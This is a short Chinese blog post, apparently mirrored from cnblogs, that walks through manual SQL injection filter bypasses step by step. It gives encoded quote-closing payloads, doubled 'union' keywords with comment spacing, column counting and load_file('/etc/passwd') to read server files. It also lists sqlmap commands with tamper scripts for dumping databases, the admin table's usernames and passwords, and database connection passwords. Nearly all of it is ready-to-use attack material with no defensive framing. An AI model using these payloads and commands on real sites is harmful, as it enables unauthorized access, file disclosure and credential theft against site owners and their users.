zoukankan      html  css  js  c++  java
  • SQL手工注入绕过过滤

    1、考虑闭合:单引号 --> %27    空格-->%20  井号--> %23 ; 构造闭合函数 %27teacher%23

    2、判断过滤内容:union --> uniunionon ; 联合查询过滤,再un后再加union ;

    3、判断列数,使用Union 语法,union 后边语句要与前边已经执行的语句列数相同。

    %27/**/ununionion/**/select/**/1/**/%23  判断是否为1列,返回值为错误,空
    %27/**/ununionion/**/select/**/1,2/**/%23 判断是否为2列 返回值为正常,则union之前的查询语句为两列
    4、id=-1 让前边的select 语句执行输出无内容,再往后执行union语句,打印相关文件内容。
    使用load_file(‘/etc/passwd’)

    %27/**/ununionion/**/select/**/1,load_file("/etc/passwd")/**/%23

    5、或者使用sqlmap -u "url" --tamper "space2comment.py, space2hash.py"

    6、SQLMAP用法:
    (1)判断库:当前库在第一行 当前是article
    sqlmap.py -u "url" --dbs
    (2)判断表名:
    sqlmap.py -u "url" --dbs  -D article (表名) --tables
    (3)判断列名:
    sqlmap.py -u "url" --dbs  -D article (表名) -T admin --columns
    (4)判断值:
     sqlmap.py -u "url" --dbs  -D article (表名) -T admin -C username, password --dump
    (5)判断数据连接用户的密码:sa
     sqlmap.py -u "url" --passwords  找到连接密码 用 nvicat连接。

     

  • 相关阅读:
    043_生成随机密码
    042_提示用户输入年份后测试判断是否为闰年
    041_查找 Linux 系统中的僵尸进程
    040_删除某个目录下大小为 0 的文件
    039_显示 CPU 厂商信息
    038_使用脚本自动创建逻辑卷
    037_自动添加防火墙规则,开启某些服务或端口(适用于 RHEL7)
    bzoj1537
    bzoj2466
    bzoj1047
  • 原文地址:https://www.cnblogs.com/Bloggeng/p/9539719.html
Copyright © 2011-2022 走看看